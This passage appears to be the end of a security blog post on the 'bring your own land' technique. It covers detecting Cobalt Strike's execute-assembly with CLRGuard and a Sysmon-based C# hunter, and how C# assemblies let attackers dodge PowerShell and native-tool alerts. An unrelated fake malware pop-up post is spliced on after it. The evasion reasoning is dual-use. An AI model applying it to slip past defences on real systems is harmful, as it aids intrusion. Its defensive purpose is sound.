There are several ways to protect against the “execute-assembly” command. As previously detailed, because the technique is a post-exploitation job in Cobalt Strike, it uses the CreateRemoteThread function, which is commonly detected by EDR solutions. However, it is possible that other implementations of BYOL techniques would not require the use of the CreateRemoteThread function.

The “execute-assembly” technique makes use of the native LoadImage function in order to load the provided assembly. The CLRGuard project hooks into the use of this function, and prevents its execution. An example of CLRGuard preventing the execution of the “execute-assembly” command is shown in Figure 7.


Figure 7: CLRGuard blocking the execution of the “execute-assembly” technique.

The resulting error is shown on the Cobalt Strike teamserver in Figure 8.


Figure 8: Error shown in Cobalt Strike when “execute-assembly” is blocked by CLRGuard.

While CLRGuard is effective at preventing the “execute-assembly” command, as well as other BYOL techniques, it is likely that blocking all use of the LoadImage function on a system would negatively impact other benign applications, and is not recommended for production environments.

As with almost all security issues, baselining and correlation are the most effective means of detecting this technique. Suspicious events to correlate could include the use of the LoadImage function by processes that do not typically utilize it, and unusual DLLs being loaded into processes.
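As one rough example of what that baselining could look like, the sketch below pulls Sysmon ImageLoad events (Event ID 7) and flags processes that load the CLR but are not on a known-good list. The baseline list and the simple string matching are purely illustrative.

// Rough sketch: flag unusual CLR loads using Sysmon ImageLoad events (Event ID 7).
// Reading the Sysmon operational log typically requires administrative rights.
// The baseline of "known CLR hosts" below is illustrative only.
using System;
using System.Diagnostics.Eventing.Reader;

class ClrLoadHunter
{
    static readonly string[] Baseline = { "powershell.exe", "devenv.exe" }; // example known-good CLR hosts

    static void Main()
    {
        var query = new EventLogQuery("Microsoft-Windows-Sysmon/Operational",
                                      PathType.LogName,
                                      "*[System[(EventID=7)]]"); // ImageLoad events only

        using (var reader = new EventLogReader(query))
        {
            for (EventRecord record = reader.ReadEvent(); record != null; record = reader.ReadEvent())
            {
                string xml = record.ToXml();
                bool loadsClr = xml.Contains("clr.dll") || xml.Contains("mscoree.dll");

                bool knownHost = false;
                foreach (string host in Baseline)
                {
                    if (xml.IndexOf(host, StringComparison.OrdinalIgnoreCase) >= 0)
                    {
                        knownHost = true;
                        break;
                    }
                }

                if (loadsClr && !knownHost)
                {
                    Console.WriteLine("Unusual CLR load:");
                    Console.WriteLine(xml);
                }
            }
        }
    }
}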

Advantages of BYOL

Due to the prevalent use of PowerShell scripts by sophisticated attackers, detection of malicious PowerShell activity has become a primary focus of current detection methodology. In particular, version 5 of PowerShell allows for the use of Script Block Logging, which is capable of recording exactly what PowerShell scripts are executed by the system, regardless of obfuscation techniques. In addition, Constrained Language mode can be used to restrict PowerShell functionality. While bypasses exist for these protections, such as PowerShell downgrade attacks, each bypass an attacker attempts is another event that a defender can trigger off of. BYOL allows for the execution of attacks normally performed by PowerShell scripts, while avoiding all potential PowerShell-based alerts entirely.

PowerShell is not the only native binary whose malicious use is being tracked by defenders. Other common binaries whose use can generate alerts include WMIC, schtasks/at, and reg. The functionality of all of these tools can be replicated within custom .NET assemblies, thanks to the flexibility of C# code. By replicating the same functionality without ever invoking the tools themselves, an attacker renders alerts based on their malicious use ineffective.
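As a small illustration of that flexibility, the sketch below reproduces a simple "reg query" of the Run key using the native .NET registry classes instead of spawning reg.exe; the key path is just an example.

// Illustrative sketch: replicate `reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"`
// with native .NET calls instead of launching reg.exe (the key path is only an example).
using System;
using Microsoft.Win32;

class RegQuerySketch
{
    static void Main()
    {
        using (RegistryKey run = Registry.LocalMachine.OpenSubKey(
                   @"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"))
        {
            if (run == null)
            {
                Console.WriteLine("Key not found.");
                return;
            }

            foreach (string valueName in run.GetValueNames())
            {
                Console.WriteLine("{0} = {1}", valueName, run.GetValue(valueName));
            }
        }
    }
}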

Finally, thanks to the use of reflective loading, the BYOL technique can be performed entirely in-memory, without the need to write to disk.

Conclusion

BYOL presents a powerful new technique for red teamers to remain undetected during their engagements, and can easily be used with Cobalt Strike’s “execute-assembly” command. In addition, the use of C# assemblies can offer attackers more flexibility than similar PowerShell scripts can afford. Detections for CLR-based techniques, such as hooking of functions used to reflectively load assemblies, should be incorporated into defensive methodology, as these attacks are likely to become more prevalent as detections for LotL techniques mature.

Acknowledgement

Special thanks to Casey Erikson, who I have worked closely with on developing C# assemblies that leverage this technique, for his contributions to this blog.

Fake Malware Pop-up Example

I don't believe I've ever done a video blog, but I wanted to show you what a fake malware pop-up looks like. While I was prepping a lecture for a class I'm teaching and looking something up on Encyclopedia Britannica, I experienced a fake malware pop-up.

Here's what I saw:

"Serifed.Stream" malicious pop-up
The best way to explain this is to show it to you. To do so, I've saved a little video of what we saw.